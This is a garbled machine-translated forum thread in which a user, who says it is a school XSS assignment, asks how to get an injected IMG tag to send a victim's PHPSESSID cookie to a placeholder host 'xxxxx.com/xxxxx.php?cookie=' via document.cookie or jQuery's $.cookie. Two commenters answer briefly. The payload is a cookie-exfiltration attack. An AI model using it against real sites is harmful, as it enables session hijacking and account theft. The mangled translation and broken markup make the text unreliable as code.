Я хотел бы передать переменную как ценность для веб-сайта. (Это назначение школы на XSS)
Например, я в настоящее время: $ .cookie ('echat') и $ .cookie ('PHPSESSID')
Я хотел бы передать его в ссылку сказать : xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID ')
Однако ничто не переходит к xxxx.com/xxx.php
any1 знать синтаксис, чтобы сделать это?
конкретно я размещения IMG тег, как это использовать:
& л IMG SRC = 'http://xxxxx.com/xxxxx.php?cookie=' + document.cookie & GT
По-видимому, document.cookie не работает, и мне нужно $ .cookie ('PHPSESSID'), чтобы получить PHPID
Вы используете '.' в вашем имени переменной? – iamsleepy
@iamsleepy Это выглядит как код jQuery. – ceejayoz
Я пытаюсь использовать людей "посадил" ошибку и столкнулся с этой проблемой. – chj